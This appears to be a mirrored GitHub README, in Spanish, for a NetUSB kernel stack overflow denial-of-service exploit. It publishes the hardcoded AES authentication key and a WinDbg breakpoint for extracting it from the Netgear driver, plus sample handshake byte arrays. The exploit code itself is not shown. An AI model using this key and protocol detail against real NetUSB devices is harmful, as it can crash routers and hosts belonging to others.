Code Monkey home page Code Monkey logo

netusb-exploit's Introduction

Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)

Dependencias

pip install pycrypto

Clave de cifrado / descifrado simétrico para la autenticación mutua entre cliente y servidor NetUSB.

AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc"

Depuración del driver NetgearUDSTcpBus.sys con WinDbg

bu NetgearUDSTcpBus+1793d #Dirección RVA del driver donde poner el breakpoint para obtener la clave de cifrado almacenada en eax.

Ejemplo comunicación KCodes NetUSB con handshake y envío del nombre del equipo cliente junto con la longitud del mismo.

#send
char peer0_0[] = {
0x56, 0x05 };
'Random data para cifrar por el dispositivo'
char peer0_1[] = {
0x44, 0xad, 0x16, 0x46, 0xbd, 0xcd, 0xb7, 0x3f, 
0x6d, 0x8c, 0xae, 0x6c, 0x42, 0x32, 0xbc, 0x53 };

#recv
'Random data cifrado por el dispositivo'
char peer1_0[] = {
0xcf, 0x08, 0x2b, 0x80, 0x46, 0x9b, 0x31, 0x28, 
0x4c, 0x76, 0xc4, 0x10, 0xda, 0xb6, 0x8c, 0x25 };
Random data para cifrar por el cliente'
char peer1_1[] = {
0xd2, 0x5d, 0xa7, 0xe7, 0xa7, 0xf7, 0x39, 0xeb, 
0x1e, 0xd3, 0x5b, 0xac, 0x34, 0x50, 0xec, 0x96 };

#send
Random data cifrado por el cliente'
char peer0_2[] = {
0x14, 0xa4, 0xe6, 0x5b, 0x8a, 0x0c, 0x04, 0x87, 	
0x5c, 0x76, 0x2b, 0xb6, 0xb9, 0xf0, 0xa6, 0xf2 };
#bytes con la longitud en caracteres del nombre del equipo
char peer0_3[] = {
0x0c, 0x00, 0x00, 0x00 };
#Nombre del equipo
char peer0_4[] = {
0x4d, 0x53, 0x4a, 0x33, 0x39, 0x53, 0x4b, 0x53, 
0x4b, 0x4b, 0x53, 0x41 };
char peer0_5[] = {
0x07, 0x00, 0x00, 0x00 };

#recv
char peer1_2[] = {
0x07, 0x00, 0x00, 0x00 };

#send
char peer0_6[] = {
0x01 };

Credits

  • Adrián Ruiz
  • w: funsecurity.net
  • t: @funsecurity.net
  • e: adrian_adrianruiz.net
  • GPG ID: 0x586270E8

netusb-exploit's People

Contributors

funsecurity avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.